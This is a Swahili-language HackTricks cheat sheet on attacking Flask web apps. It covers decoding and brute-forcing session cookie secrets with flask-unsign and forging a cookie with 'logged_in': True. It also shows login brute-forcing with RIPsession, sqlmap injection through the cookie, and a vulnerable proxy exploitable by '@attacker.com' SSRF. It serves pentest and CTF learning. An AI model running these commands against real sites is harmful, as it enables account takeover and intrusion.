5.7 KiB
Flask
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Tumia Trickest kujenga na kutumia workflows kwa kutumia zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
Labda ikiwa unacheza CTF programu ya Flask itahusiana na SSTI.
Cookies
Jina la kikao cha biskuti cha chaguo-msingi ni session
.
Mchawi
Mchawi wa mtandaoni wa biskuti za Flask: https://www.kirsle.net/wizards/flask-session.cgi
Kwa Mkono
Pata sehemu ya kwanza ya biskuti hadi alama ya kwanza na ikague Base64>
echo "ImhlbGxvIg" | base64 -d
Cookie pia inasainiwa kutumia nenosiri
Flask-Unsign
Zana ya mstari wa amri ya kupata, kudecode, kufanya nguvu ya kutumia na kutengeneza vidakuzi vya kikao vya programu ya Flask kwa kudhani funguo za siri.
{% embed url="https://pypi.org/project/flask-unsign/" %}
pip3 install flask-unsign
Tafsiri Cookie
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
Kulazimisha Kwa Nguvu
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
Kusaini
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
Kusaini kwa kutumia (toleo za zamani)
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
RIPsession
Chombo cha mstari wa amri cha kuvunja nguvu tovuti kwa kutumia vidakuzi vilivyoundwa na flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
SQLi katika kuki ya kikao cha Flask na SQLmap
Mfano huu hutumia chaguo la eval
la sqlmap kwa kiotomatiki kusaini mizigo ya sqlmap kwa flask kwa kutumia siri inayojulikana.
Flask Proxy kwa SSRF
Katika andishi hili imeelezwa jinsi Flask inavyoruhusu ombi linaloanza na herufi "@":
GET @/ HTTP/1.1
Host: target.com
Connection: close
Ni ipi katika hali ifuatayo:
from flask import Flask
from requests import get
app = Flask('__main__')
SITE_NAME = 'https://google.com/'
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content
app.run(host='0.0.0.0', port=8080)
Inaweza kuruhusu kuingiza kitu kama "@attacker.com" ili kusababisha SSRF.
Tumia Trickest kujenga na kutumia workflows kwa urahisi zinazotumia zana za jamii za juu zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=flask" %}
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.